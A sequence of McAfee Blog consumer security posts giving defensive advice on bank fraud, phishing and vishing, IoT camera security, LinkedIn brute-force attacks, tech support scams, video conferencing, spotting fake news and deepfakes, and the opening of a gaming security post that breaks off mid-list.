Two-factor authentication is practically a standard, so much so that you already might be using it right now when you bank or use certain accounts. If not, you can see if your bank offers it as an option in your settings the next time you log in. Or, you can contact your bank for help to get it set up. 

Avoid phishing attacks: Look at your email inbox with a skeptical eye 

Phishing is a popular way for crooks to steal personal information by way of email, where a crook will look to phish (“fish”) personal and financial information out of you. No two phishing emails look alike. They can range from a request from a stranger posing as a lawyer who wants you to help with a bank transfer—to an announcement about (phony) lottery winnings. “Just send us your bank information and we’ll send your prize to you!” Those are a couple of classics. However, phishing emails have become much more sophisticated in recent years. Now, slicker hackers will pose as banks, online stores, and credit card companies, often using well-designed emails that look almost the same as the genuine article. 

Of course, those emails are fakes. The links they embed in those emails lead you to them, so they can steal your personal info or redirect a payment their way. One telltale sign of a phishing email is if the sender used an address that slightly alters the brand name or adds to it by tacking extra language at the end of it. If you get one of these emails, don’t click any of the links. Contact the institute in question using a phone number or address posted on their official website. This is a good guideline in general. The best avenue of communication is the one you’ve used and trusted before. 

Be skeptical about calls as well. Fraudsters use the phone too. 

It might seem a little traditional, yet criminals still like to use the phone. In fact, they rely on the fact that many still see the phone as a trusted line of communication. This is known as “vishing,” which is short for “voice phishing.” The aim is the same as it is with phishing. The fraudster is looking to lure you into a bogus financial transaction or attempting to steal information, whether that’s financial, personal, or both. They might call you directly, posing as your bank or even as tech support from a well-known company, or they might send you a text or email that directs you to call their number. 

For example, a crook might call and introduce themselves as being part of your bank or credit card company with a line like “there are questions about your account” or something similar. In these cases, politely hang up. Next, call your bank or credit card company to follow up on your own. If the initial call was legitimate, you’ll quickly find out and can handle the issue properly. If you get a call from a scammer, they can be very persuasive. Remember, though. You’re in charge. You can absolutely hang up and then follow up using a phone number you trust. 

Steer clear of financial transactions on public Wi-Fi in cafes, hotels, and libraries 

There’s a good reason not to use public Wi-Fi: it’s not private. They’re public networks, and that means they’re unsecure and shared by everyone who’s using it, which allows hackers to read any data passing along it like an open book. That includes your accounts and passwords if you’re doing any banking or shopping on it. The best advice here is to wait and handle those things at home if possible. (Or connect to public Wi-Fi with a VPN service, which we’ll cover below in a moment.)  

If not, you can always use your smartphone’s data connection to create a personal hotspot for your laptop, which will be far more secure. Another option is to use your smartphone alone. With a combination of your phone’s data connection and an app from your bank, you can take care of business that way instead of using public Wi-Fi. That said, be aware of your physical surroundings too. Make sure no one is looking over your shoulder! 

Protecting your banking and finances even further 

Some basic digital hygiene will go a long way toward protecting you even more—not only your banking and finances, but all the things you do online as well. The following quick list can help: 

• Update your software – That includes the operating system of your computers, smartphones, and tablets, along with the apps that are on them. Many updates include security upgrades and fixes that make it tougher for hackers to launch an attack. 
• Lock up – Your computers, smartphones, and tablets will have a way of locking them with a PIN, a password, your fingerprint, or your face. Take advantage of that protection, which is particularly important if your device is lost or stolen.
  
•  Use security software – Protecting your devices with comprehensive online protection software will fend off the latest malware, spyware, and ransomware attacks, plus further protect your privacy and identity. 
• Consider connecting with a VPN – also known as a “virtual private network,” a VPN helps you stay safer with bank-grade encryption and private browsing. It’s a particularly excellent option if you find yourself needing to use public Wi-Fi because a VPN effectively makes a public network private. 
• Check your credit report and monitor your transactions – This is an important thing to do in today’s password- and digital-driven world. Doing so will uncover any inconsistencies or outright instances of fraud and put you on the path to setting them straight. Online protection software can help with this as well. It can keep an eye on your credit and your transactions all in one place, providing you notifications if anything changes. That same monitoring can extend to retirement, investment, and loan accounts as well. Check out our plans and see which options work best for you.

The post Online Banking—Simple Steps to Protect Yourself from Bank Fraud appeared first on McAfee Blog.

People who use devices like smart cameras and Wi-Fi-enabled baby monitors should strongly consider taking the following steps to protect their devices:

1. Update your devices. Manufacturers often advise consumers to update their software to the latest version and enable further security features. Updating your devices regularly increases the chances that you’ll receive security improvements soon after they become available.  

2. Do not connect to your smart cameras, baby monitors, and other devices through public Wi-Fi. Accessing these devices via a smartphone app from an unprotected network can compromise the security of your devices. Use a VPN or a secure cellular data connection instead. 

3. Use strong, unique passwords. Every device of yours should have one, along with a unique username to go along with it. In some cases, connected devices ship with default usernames and passwords, making them that much easier to hack. 

Further protect your connected cameras, baby monitors, and other devices 

With those immediate steps in place, this security advisory offers you a chance to take a fresh look at your network and device security overall. With these straightforward steps in place, you’ll be  more protected against such events in the future—not to mention more secure in general.  

1. Use two-factor authentication 

Our banks, many of the online shopping sites we use, and numerous other accounts use two-factor authentication to help validate that we’re who we say we are when logging in. In short, a username and password combo is an example of one-factor authentication. The second factor in the mix is something you, and only you, own or control, like your mobile phone. Thus, when you log in and get a prompt to enter a security code that’s sent to your mobile phone, you’re taking advantage of two-factor authentication. If your IoT device supports two-factor authentication as part of the login procedure, put it to use and get that extra layer of security. 

2. Secure your internet router 

Your router acts as the internet’s gateway into your home. From there, it works as a hub that connects all your devices—computers, tablets, and phones, along with your IoT devices as well. That means it’s vital to keep your router secure. A quick word about routers: you typically access them via a browser window and a specific address that’s usually printed somewhere on your router. Whether you’re renting your router through your internet provider or have purchased one, the internet provider’s “how to” guide or router documentation can step you through this process. 

The first thing to do is change the default password of your router if you haven’t done so already. Again, use a strong method of password creation. Also, change the name of your router. When you choose a new one, go with name that doesn’t give away your address or identity. Something unique and even fun like “Pizza Lovers” or “The Internet Warehouse” are options that mask your identity and are memorable for you too. While you’re making that change, you can also check that your router is using an encryption method, like WPA2, which helps secure communications to and from your router. If you’re unsure what to do, reach out to your internet provider or router manufacturer. 

3. Set up a guest network specifically for your IoT devices 

Just as you can offer your human guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices, like computers and smartphones, along with the data and info that you have stored on them. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network. 

4. Update! 

We mentioned this above, yet it’s so important that it calls for a second mention: make sure you have the latest software updates for your IoT devices. That will make sure you’re getting the latest functionality from your device, and updates often contain security upgrades. If there’s a setting that lets you receive automatic updates, enable it so that you always have the latest. 

5. Protect your phone 

You’ve probably seen that you can control a lot of your connected things with your smartphone. We’re using them to set the temperature, turn our lights on and off, and even see who’s at the front door. With that, it seems like we can add the label “universal remote control” to our smartphones—so protecting our phones has become yet more important. Whether you’re an Android or iOS device user, get security software installed on your phone so you can protect all the things it accesses and controls—in addition to you and the phone as well. 

And protect your other things too 

Using a strong suite of security software like McAfee+ Advanced, can help defend your entire family from the latest threats and malware, make it safer to browse, and look out for your privacy too. 

The post How to Protect Your Smart Cameras and Wi-Fi Baby Monitors appeared first on McAfee Blog.

If you’re a LinkedIn user, log in now and strengthen your security. Reports indicate that LinkedIn accounts are under attack.

First brought to light by Cyberint, LinkedIn users have taken to social media with word that their accounts have been frozen or outright hacked. In some cases, users received ransom notes for the return of their hacked accounts.

It appears that LinkedIn is weathering a wave of brute-force attacks. This type of attack works much like it sounds—hackers try to force their way into accounts by guessing passwords. With powerful hacking apps, they can guess millions of passwords in seconds.

As a result, one of two things is happening:

• LinkedIn users receive an official, legitimate email from LinkedIn alerting them that their account has been locked due to unusual activity. This measure likely kicked in because of a brute force attack or because the attack occurred on an account using two-factor authentication. In this case, the account wasn’t compromised. However, these users then must reactivate their accounts per instructions provided by LinkedIn.
• Users try to log in and find that their password has been changed. Effectively, their account has been hacked. Reports show that some of these accounts get deleted. In other cases, the hacker changes the account’s email to an address using the “rambler.ru” domain, which makes the account unrecoverable by the user.

Given the scope, scale, and consistent use of the rambler.ru domain, this has all the signs of an organized attack. As of this writing, no group has claimed credit.

How quickly can someone hack my password with a brute force attack?

If any event underscores the need for strong, unique passwords, this is it.

Given today’s computing power, the password generators hackers use for brute force attacks can create millions of passwords in seconds. Weak passwords have no chance against them. It’s a simple matter of statistics.

Consider a password that uses eight numbers, uppercase and lowercase letters, and symbols. Sounds pretty strong, right? Unfortunately, a brute force attack might crack that password in as fast as one second.

However, increase that password length to twelve numbers, uppercase and lowercase letters, and symbols—it’d that eight months to crack that password. Bump it up to 16, and it would take 16 million years. The longer it is, the more complex it is. And thus tougher to crack. It’s the difference between one second and 16 million years. And if a hacker’s brute force attack on one password takes too long, it’ll simply move onto the next one.

How to protect yourself from the LinkedIn attacks.

Log into your LinkedIn account now and verify that it’s indeed secure. Then, take the following steps:

• Enable two-factor authentication. You’ll find this in your security settings. Using two-factor authentication makes hacking your account far, far more difficult than hacking it with password protection alone.
• Set a new password. Make it strong and unique, using numbers, uppercase letters, lowercase letters, and symbols. As illustrated above, the longer the better—14 or even up to 16 characters.
• Confirm your contact email. LinkedIn will alert users of unusual activity. Ensure that the contact information in your account profile uses an email address that you regularly check.

How to create your own strong, unique password. One that you can still remember.

Fourteen characters? Even up to 16 characters? How do you create that without just mashing on your keyboard? (Not recommended.) A layered password can do the work. It’s a way of creating a phrase and turning it into a strong, unique password that you can still remember.

1. Pick a phrase that is memorable for you: Don’t use easily discovered information, like your birthdate or pet’s name. Try something linked with an interest or hobby. If you’re an avid runner, you might choose a phrase like, “Running 26.2 Rocks!”
2. Replace letters with numbers and symbols: Remove the spaces. Then, you can put symbols and numbers in the place of some of the letters. Runn1ng26.2R0ck$!
3. Include a mix of letter cases: Finally, you want lower and uppercase letters that aren’t in a clear pattern. Algorithms know how to look for common patterns like camelCase or PascalCase. Runn1NG26.2R0cK$!

Now, you have a 17-character password that challenges hackers and that’s still something you can remember.

Or, have a password manager handle the strong, unique passwords for you.

Granted, creating strong, unique passwords for dozens and dozens of accounts can take a bit of time. (To put it mildly.) It can take yet more time if you manage them, such as if change them regularly (which can help protect you from data breaches and brute force attacks like this one at LinkedIn). Here, a password manager can help.

A password manager can create, memorize, and store strong, unique passwords. It’ll use the random numbers, letters, and characters we mentioned earlier. The passwords won’t be memorable, but the manager does the memorizing for you. You can also use it to update passwords regularly. In a time of data breaches, this offers you extra protection. Taken together, every account you have gets powerful password protection when you hand the job over to a password manager.

Log in now and secure your LinkedIn account.

This wave of attacks reminds us just how powerful, or weak, our passwords can be. A strong, unique password in conjunction with two-factor authentication stands as your best defense as LinkedIn weathers these attacks. Strengthen your security.

Strengthen your other accounts as well. Hackers target websites and platforms of all sizes, and not every attack makes the headlines. Strong security measures for each of your accounts will protect you best if you end up as a hacker’s target.

The post How to Safeguard Your LinkedIn Account and Strengthen Your Security appeared first on McAfee Blog.

Instead of getting you out of a jam, tech support scams get you into one. And they can get costly.

Tech support scammers had a banner year in 2022. They raked in more than $800 million in the U.S. alone, according to the FBI’s list of reported cases. The actual figure climbs higher when you factor in all the unreported cases. And it goes yet higher still when you consider all the victims worldwide.

In all, tech support scams make up a multi-billion-dollar industry.

They make their money several ways. Sometimes the scammers who run them charge large fees to fix a non-existent problem. Other times, they’ll install information-stealing malware under the guise of software that’s supposed to correct an issue. In some cases, they’ll ask for remote access to your computer to perform a diagnosis, but access your computer to steal information instead. Or they could hit you with several of the above.

You can stumble across these scams on your own as you go about your day online. Other times, they find you, such as when the scammer calls you directly.

One of our employees shared his story when a tech support scammer called his wife out of the blue:

I was messing around on my computer before dinner. My wife came in with a strange look on her face as she told the person on the phone, “I think you might want to talk to my husband about that.” Once on the phone I was greeted with, “Hi, this is Rick from Windows support and we’re calling because your computer is sending junk files to the internet.” I knew there was no way he was from “Windows support” since a reputable company isn’t going to call me up out of the blue like this, but as a security researcher I was curious, so I jumped right in.

“Rick” said that to fix my issue he needed me to install a free remote access tool and give him access to my system. Letting an unknown person access my actual computer seemed like a bad idea, so I let him log on to a “virtual machine” that I use for security testing. The first thing he did was turn off my security software, including the antivirus and firewall. After doing that, he downloaded a file that he tried to install. Since I had additional security software in place he wasn’t aware of, the installation failed each time he tried to run it. At this point, I had the file he was trying to install, the IP address he was connecting from, and the site he used to get the malicious file. I told “Rick” that I work for a security company and would like to know what he was actually looking for. I’m fairly certain he hung up before I completed my sentence.

Sure enough, after the call, a malware scan confirmed that “Rick” wanted to install a remote access tool (RAT) that would have given him full control of the computer.

That’s one example of how these scams go. They get costly too. The FBI further reported that the average loss for a tech support scam approached $25,000. In some cases, pop-up “security alert” ads spearheaded scams that cost people $200,000 and upwards to $1 million.

Fortunately, these scams are rather easy to spot. And avoid. If you know what to look for.

 What do tech support scams look like?

Let’s start with a quick overview of tech support scams. They tend to work in two primary ways.

First, there are the scams that track you down.

This might be a phone call that comes from someone posing as a rep from “Microsoft” or “Apple.” The scammer on the other end of the line will tell you that there’s something wrong with your computer or device. Something urgently wrong. And then offers a bogus solution to the bogus problem, often at a high cost. Similarly, they might reach you by way of a pop-up ad. Again telling you that your computer or device needs urgent repairs. These can find you a few different ways:

• By clicking on links from unsolicited emails.
• From pop-up ads from risky sites.
• Via pop-ups from otherwise legitimate sites that have had malicious ads injected.
• By way of spammy phone calls made directly to you, whether by robocall or a live operator.

Second, there are the scams that lie in wait.

These are phony services and sites that pose as legitimate tech support but are anything but. They’ll place search ads, post other ads on social media, and so forth, ready for you to look up and get in touch with when you have a problem that you need fixed. Examples include:

• Online classified ads, forum posts, and blog sites.
• Ads on Social media sites such as Facebook, Reddit, YouTube, and Tumblr.
• Search results—scammers place paid search ads too!

How to spot and avoid tech support scams

• With regards to ads and search results, keep an eye open for typos, awkward language, or poor design and logos that look like they could be a knockoff of a trusted brand. Check our top tips to spot tech support scams of what these ads and search results look like.
• Don’t fall for the call. If someone calls you with an offer of “tech support.” Chances are, it’s a scam. And if they ask for payment in gift cards or cryptocurrency like bitcoin, it’s absolutely a scam. Just hang up.
• Note that big tech companies like Apple and Microsoft won’t call you with offers of tech support or an alert that “something is wrong with your computer.” Such calls come from imposters. Moreover, in many cases, the company will offer free support as part of your purchase or subscription that you can get on your own when you need it. (For example, that’s the case with our products.)
• Don’t click or tap on any links or call any numbers that suddenly appear on your screen and warn you of a computer problem. Again, this is a likely sign of an attempted scam. Often, this will happen while browsing. Simply close your browser and open a fresh browser window to clear the ad or link.
• Go to the source. Contact the company directly for support, manually type their address into your browser, or call the number that came with the packaging or purchase. Don’t search. This will help you avoid imposters that clog up search results with bogus ads.
• Protect your browsing. Use a web protection extension that can spot malicious sites and help prevent you from clicking on them by mistake. Comprehensive online protection software will offer protection for your browsing, in addition to protection from malware and viruses.
• Remove your personal info from data broker sites. How did that scammer get your phone number in the first place? Scammers often purchase personal information in bulk from data broker sites, which can include your phone number. Our Personal Data Cleanup can help you remove your information from some of the riskiest data broker sites out there.

Lastly, a good piece of general advice is to keep your devices and apps up to date. Regular updates often include security fixes and improvements that can help keep scammers and hackers at bay. You can set your devices and apps to download them automatically. And if you need to get an update or download on your own, get it from the company’s official website. Stay away from third-party sites that might host malware.

What to do if you think you’ve been scammed:

1. Change your passwords. This will provide protection if the scammer was able to access your account passwords in some form. While this can be a big task, it’s a vital one. A password manager that’s part of comprehensive online protection can make it much easier.
2. Run a malware and virus scan right away. Delete files or apps that the software says is an issue. Do the same for other devices on your network too. Experienced and determined scammers can infect them as well by gaining access to one device on your network.
3. Stop payment. Contact your bank, credit card company, or online payment platform to reverse the charges. File a fraud complaint as well. The sooner you act, the better chance you have of recovering some or all your money. (Note that this is a good reason to use credit cards for online purchases, as they afford extra protection that debit cards and other payment services don’t.)
4. Report the scam. In the U.S., you can contact the Federal Trade Commission, which reports the claim to thousands of law enforcement agencies. While they can’t resolve your individual issue, your report can help with broader investigations and build a case against scammers—which can make the internet safer for others. Their list of FAQs is particularly helpful too, answering important questions like “how do I get my money back?”

The post Be on the Lookout for Scam Tech Support Calls appeared first on McAfee Blog.

For millions of people, it’s not a workday without it—video conferencing. And plenty of business gets done that way, which has made conferencing a target for hackers. That then begs the important question, how secure is video conferencing? 

The answer is pretty secure, if you’re using a reputable service. Yet you can take further steps to keep hackers and party crashers out of your meetings. 

Why would someone want to crash your meeting? 

Hackers and party crashers are likely motivated by one of two things: financial gain or mischief.  

Given that some meetings involve confidential or sensitive information, someone might have financial motivation to join in, spy on, or record the meeting. Recently, we saw the lengths at least one AI company allegedly went to on one video conference call. And of course, some bad actors just want to cause a disruption. As we saw in recent years, they’ll barge right into a meeting and create a ruckus with rude speech and other antics. Falling somewhere in between, some hackers might try to intrude on a meeting and slip a malware-laden attachment into chat. For one, that can lead to a major disruption. And in a business context, financial disruption as well. 

How do they pull it off? The typical avenues of attack apply. They might use stolen or hijacked accounts. The meeting was inadvertently set to “public,” allowing anyone with a link to join. Otherwise, they might compromise a victim’s device to piggyback their way in. 

Protecting your video calls 

As millions of people around the world practice social distancing and work their office jobs from home,  

Use a service with end-to-end encryption 

Put simply, end-to-end encryption provides a solid defense against prying eyes. With it in place, this form of encryption makes it particularly difficult for hackers to tap into the call and the data shared within it. Secure video conferencing should use 256-bit AES GCM encryption for audio and video, and for any sharing of screens, whiteboard apps, and the like. On a related note, read the service’s privacy policy and ensure that its privacy, security, and data measures fit your needs.   

Make your meetings private and protect them with a password 

Keep the uninvited out. First, setting your meeting to private (invitees only) will help keep things secure. Some apps also provide a notification to the meeting organizer when an invite gets forwarded. Use that feature if it’s available. Also, a password provides another hurdle for a hacker or bad actor to clear. Use a fresh one for each meeting.  

Use the waiting room 

Many services put attendees into a waiting room before they enter the meeting proper. Use this feature to control who comes in and out. 

Block users from taking control of the screen 

Welcome or unwelcome, you can keep guests from taking over the screen. Select the option to block everyone except the host (you) from screen sharing.   

Turn on automatic updates 

By turning on automatic updates, you will get the latest security patches and enhancements for your video conferencing tool as soon as they become available.   

Get wise to phishing scams 

Some interlopers make it into meetings by impersonating others. Just as bad actors will use phishing emails and texts to steal personal financial information, they’ll use them to steal company credentials as well. Our Phishing Scam Protection Guide can show you how to steer clear of these attacks. 

Avoid public Wi-Fi 

Public Wi-Fi is exactly that. Public. This means anyone, with effort, can tap into your connection and gain access to the data and information shared. If you have to hop on a meeting, with your device and public Wi-Fi, use a VPN to keep the connection secure. 

Use online protection software 

Comprehensive online protection software like ours can make for safer calls in several ways. For one, it protects you against malware attacks, such as if a bad actor tries to slip a sketchy download into your meeting. Further, it includes a password manager that creates and stores strong, unique passwords securely. This can help increase the security of your video conferencing account.  

The post How Secure is Video Conferencing? appeared first on McAfee Blog.

Spotting fake news in your feed has always been tough. Now it just got tougher, thanks to AI. 

Fake news crops up in plenty of places on social media. And it has for some time now. In years past, it took the form of misleading posts, image captions, quotes, and the sharing of outright false information in graphs and charts. Now with the advent of AI, we see fake news taken to new levels of deception:  

• Deepfake videos that mimic the looks and parrot the words of well-known public figures.  
• AI-generated voice clones that sound spooky close to the voices they mimic.  
• Also, entire news websites generated by AI, rife with bogus stories and imagery.  

All of it’s out there. And knowing how to separate truth from fact has never been of more importance, particularly as more and more people get their news via social media.  

Pew Research found that about a third of Americans say they regularly get their news from Facebook and nearly 1 in 4 say they regularly get it from YouTube. Moreover, global research from Reuters uncovered that more people primarily get their news from social media (30%) rather than from an established news site or app (22%). This marks the first time that social media has toppled direct access to news. 

Yet, you can spot fake news. Plenty of it.  

The process starts with a crisp definition of what fake news is, followed by the forms it takes, and then a sense of what the goals behind it are. With that, you can apply a critical eye and pick out the telltale signs.  

We’ll cover it all here. 

What is fake news? 

A textbook definition of fake news goes something like this:  

A false news story, fabricated with no verifiable facts, and presented in a way to appear as legitimate news.  

As for its intent, fake news often seeks to damage the reputation of an individual, institution, or organization. It might also spout propaganda or attempt to undermine established facts. 

That provides a broad definition. Yet, like much fake news itself, the full definition is much more nuanced. Within fake news, you’ll find two categories: disinformation and misinformation: 

• Disinformation: This is intentionally misleading information that’s been manipulated to create a flat-out lie—typically with an ulterior motive in mind. Here, the creator knows that the information is false. 

• Example: As a bad joke, a person concocts a phony news story that a much-anticipated video game release just got canceled. However, the game will certainly see its release. In the meantime, word spreads and online fans whip up into a frenzy. 

• Misinformation: This simply involves getting the facts wrong. Unknowingly so, which separates itself from disinformation. We’re only human, and sometimes that means we forget details or recall things incorrectly. Likewise, when a person shares disinformation, that’s a form of misinformation as well, if the person shares it without fact-checking.  

• Example: A person sees a post that a celebrity has died and shares that post with their friends and followers—when in fact, that celebrity is still very much alive. 

From there, fake news gets more nuanced still. Misinformation and disinformation fall within a range. Some of it might appear comical, while other types might have the potential to do actual harm.  

Dr. Claire Wardle, the co-director of the Information Futures Lab at Brown University, cites seven types of misinformation and disinformation on a scale as visualized below: 

 Source – FirstDraftNews.org and Brown University 

Put in a real-life context, you can probably conjure up plenty of examples where you’ve seen. Like clickbait-y headlines that link to letdown articles with little substance. Maybe you’ve seen a quote pasted on the image of a public figure, a quote that person never made. Perhaps an infographic, loaded with bogus statistics and attributed to an organization that doesn’t even exist. It can take all forms.  

Who’s behind fake news? And why? 

The answers here vary as well. Greatly so. Fake news can begin with a single individual, groups of like-minded individuals with an agenda, and it can even come from operatives for various nation-states. As for why, they might want to poke fun at someone, drive ad revenue through clickbait articles, or spout propaganda.  

Once more, a visualization provides clarity in this sometimes-murky mix of fake news:   

 Source – FirstDraftNews.org and Brown University 

In the wild, some examples of fake news and the reasons behind it might look like this: 

• Imposter sites that pose as legitimate news outlets yet post entirely unfounded pieces of propaganda. 
• Parody sites that can look legitimate, so much so that people might mistake their content for actual news. 
• AI deepfakes, images, recordings, and videos of public figures in embarrassing situations, yet that get presented as “real news” to damage their reputation. 

Perhaps a few of these examples ring a bell. You might have come across some where you weren’t exactly sure if it was fake news or not.  

The following tools can help you know for sure. 

Spotting what’s real and fake in your social media feed. 

Consider the source 

Some of the oldest advice is the best advice, and that holds true here: consider the source. Take time to examine the information you come across. Look at its source. Does that source have a track record of honesty and dealing plainly with the facts?  

• For an infographic, you can search for the name of its author or the institution that’s attributed to it. Are they even real in the first place? 
• For news websites, check out their “About Us” pages. Many bogus sites skimp on information here, whereas legitimate sites will go to lengths about their editorial history and staff.  

• For any content that has any citation listed to legitimize it as fact, search on it. Plenty of fake news uses sources and citations that are just as fake too. 

Check the date 

This falls under a similar category as “consider the source.” Plenty of fake news will take an old story and repost it or alter it in some way to make it appear relevant to current events. In recent years, we’ve seen fake news creators slap a new headline on a new photo, all to make it seem like it’s something current. Once again, a quick search can help you tell if it’s fake or not. Try a reverse image search and see what comes up. Is the photo indeed current? Who took it? When? Where? 

Check your emotions too 

Has a news story you’ve read or watched ever made you shake your fist at the screen or want to clap and cheer? How about something that made you fearful or simply laugh? Bits of content that evoke strong emotional responses tend to spread quickly, whether they’re articles, a post, or even a tweet. That’s a ready sign that a quick fact check might be in order. The content is clearly playing to your biases. 

There’s a good reason for that. Bad actors who wish to foment unrest, unease, or spread disinformation use emotionally driven content to plant a seed. Whether or not their original story gets picked up and viewed firsthand doesn’t matter to these bad actors. Their aim is to get some manner of disinformation out into the ecosystem. They rely on others who will re-post, re-tweet, or otherwise pass it along on their behalf—to the point where the original source of the information gets completely lost. This is one instance where people readily begin to accept certain information as fact, even if it’s not factual at all. 

Certainly, some legitimate articles will generate a response as well, yet it’s a good habit to do a quick fact check and confirm what you’ve read.  

Expand your media diet 

A single information source or story won’t provide a complete picture. It might only cover a topic from a certain angle or narrow focus. Likewise, information sources are helmed by editors and stories are written by people—all of whom have their biases, whether overt or subtle. It’s for this reason that expanding your media diet to include a broad range of information sources is so important. 

So, see what other information sources have to say on the same topic. Consuming news across a spectrum will expose you to thoughts and coverage you might not otherwise get if you keep your consumption to a handful of sources. The result is that you’re more broadly informed and can compare different sources and points of view. Using the tips above, you can find other reputable sources to round out your media diet. 

Additionally, for a list of reputable information sources, along with the reasons they’re reputable, check out “10 Journalism Brands Where You Find Real Facts Rather Than Alternative Facts” published by Forbes and authored by an associate professor at The King’s College in New York City. It certainly isn’t the end all, be all of lists, yet it should provide you with a good starting point. 

Let an expert do the fact-checking for you 

De-bunking fake news takes time and effort. Often a bit of digging and research too. Professional fact-checkers at news and media organizations do this work daily. Posted for all to see, they provide a quick way to get your answers. Some fact-checking groups include: 

• Politifact.com 
• Snopes.com 
• FactCheck.org 
• Reuters Fact Check 

Three ways to spot AI-generated fakes  

As AI continues its evolution, it gets trickier and trickier to spot it in images, video, and audio. Advances in AI give images a clarity and crispness that they didn’t have before, deepfake videos play more smoothly, and voice cloning gets uncannily accurate.  

Yet even with the best AI, scammers often leave their fingerprints all over the fake news content they create. Look for the following: 

1) Consider the context  

AI fakes usually don’t appear by themselves. There’s often text or a larger article around them. Inspect the text for typos, poor grammar, and overall poor composition. Look to see if the text even makes sense. And like legitimate news articles, does it include identifying information—like date, time, and place of publication, along with the author’s name.  

2) Evaluate the claim 

Does the image seem too bizarre to be real? Too good to be true? Today, “Don’t believe everything you read on the internet,” now includes “Don’t believe everything you see on the internet.” If a fake news story is claiming to be real, search for the headline elsewhere. If it’s truly noteworthy, other known and reputable sites will report on the event—and have done their own fact-checking. 

3) Check for distortions 

The bulk of AI technology still renders fingers and hands poorly. It often creates eyes that might have a soulless or dead look to them—or that show irregularities between them. Also, shadows might appear in places where they look unnatural. Further, the skin tone might look uneven. In deepfaked videos, the voice and facial expressions might not exactly line up, making the subject look robotic and stiff.  

Be safe out there 

The fact is that fake news isn’t going anywhere. It’s a reality of going online. And AI makes it tougher to spot. 

At least at first glance. The best tool for spotting fake news is a fact-check. You can do the work yourself, or you can rely on trusted resources that have already done the work.  

This takes time, which people don’t always spend because social platforms make it so quick and easy to share. If we can point to one reason fake news spreads so quickly, that’s it. In fact, social media platforms reward such behavior. 

With that, keep an eye on your own habits. We forward news in our social media feeds too—so make sure that what you share is truthful too. 

Be safe out there 

Plenty of fake news can lure you into sketchy corners of the internet. Places where malware and phishing sites take root. Consider using comprehensive online protection software to keep safe. In addition to several features that protect your devices, privacy, and identity, they can warn you of unsafe sites too. While it might not sniff out AI content (yet), it offers strong protection against bad actors who might use fake news to steal your information or harm your data and devices.  

The post How to Spot Fake News in Your Social Media Feed appeared first on McAfee Blog.

Vanquishing aliens, building virtual amusement parks, mashing buttons in online battles royale. For some, playing video games is a way to unwind from the day and momentarily journey to new worlds. Others game because they love the competition or enjoy participating in the online community around their favorite game.  

But just like other online realms, gaming isn’t free of cybercriminals. Cybercriminals take advantage of highly trafficked online gaming portals to make a profit on the dark web.  

The next time you log on to your virtual world of choice, level up your gaming security to protect your device and your personally identifiable information (PII).   

Why Do Cybercriminals Target Gamers? 

Gaming companies host a trove of valuable information. Gamers trust these platforms with their payment information, personal details, passwords, and with the safety of their gaming characters on which they spend thousands of hours and hundreds of dollars upgrading.  

Cybercriminals also target gamers through malware disguised as an advantage. Cheat software for online games is common as players strive to be the best among their opponents. For instance, a malware scam targeted players seeking an advantage for “Call of Duty: Warzone.” The malware creators advertised the “cheat software” on YouTube with instructions on how to download it. The video received thousands of views and hundreds of comments, which made it look legitimate.  

One of the steps in installing the “cheat software” was that users had to disable antivirus programs and firewalls. Users let the cybercriminals walk right into their device! From there, an aggressive type of fileless malware called a dropper infected the device. A dropper doesn’t download a malicious file; rather, it creates a direct pathway to deliver an additional payload, such as credential-stealing malware.¹  

5 Gamer Security Tips 

Competitive gaming is, well, competitive. So, if you invest a lot of real money into your characters, be especially vigilant and follow these five important tips to protect your online accounts. 

1. Do not reveal personal information

It’s common for gamers to use variations of their real names and birthdates in their public-facing usernames. Doing this could reveal personal information that you’d rather keep private. Consider using a nickname or a combination of random numbers instead. Along this same vein, don’t reveal personal details about yourself (phone number, hometown, places you visit regularly, etc.) on chats or streams. Lurking cybercriminals can gather these personal details to impersonate you. 

2. Edit your privacy settings